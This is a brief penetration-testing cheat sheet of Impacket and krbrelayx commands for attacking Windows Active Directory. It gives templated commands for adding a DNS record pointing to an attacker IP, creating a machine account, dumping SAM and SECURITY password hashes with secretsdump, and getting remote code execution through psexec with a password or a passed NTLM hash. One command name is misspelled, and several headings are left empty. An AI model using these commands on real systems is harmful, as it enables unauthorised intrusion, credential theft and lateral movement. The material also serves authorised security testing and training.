Impacket
Collection of useful impacket commands common in engagements.
Add DNS record
# Git clone following repo: https://github.com/dirkjanm/krbrelayx/tree/master
python3 dnstool.py -u <domain\username> -p <password> -a add -r <ns-record> -d <attacker-ip> <dc-ip>
# Check if NS record has been added
python3 dnstool.py -u <domain\username> -p <password> -a query -r <ns-record> -d <attacker-ip> <dc-ip>Add computer account
impacket-addcomputer -dc-ip <DC-IP> -computer-name <COMPUTER-NAME>$ -computer-pass '<PASSWORD>' '<DOMAIN-FQDN>/<USERNAME>:<PASSWORD>'Dump local hashes with secretsdump
# Dump SAM
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
# Dump SECURITY
impacket-secretsdump -security SECURITY -system SYSTEM LOCALRCE with psexec
# With a password
impacket-psxec <domain>/<username>:'<password>'@<target>
# With a hash
impacket-psexec <domain>/<username>@<target> -hashes <ntlm>:<ntlm>SMBclient
MSSQLclient
Get a list of all AD users
Dump SAM and SYSTEM using registry
Enumerate Group Policy passwords
Last updated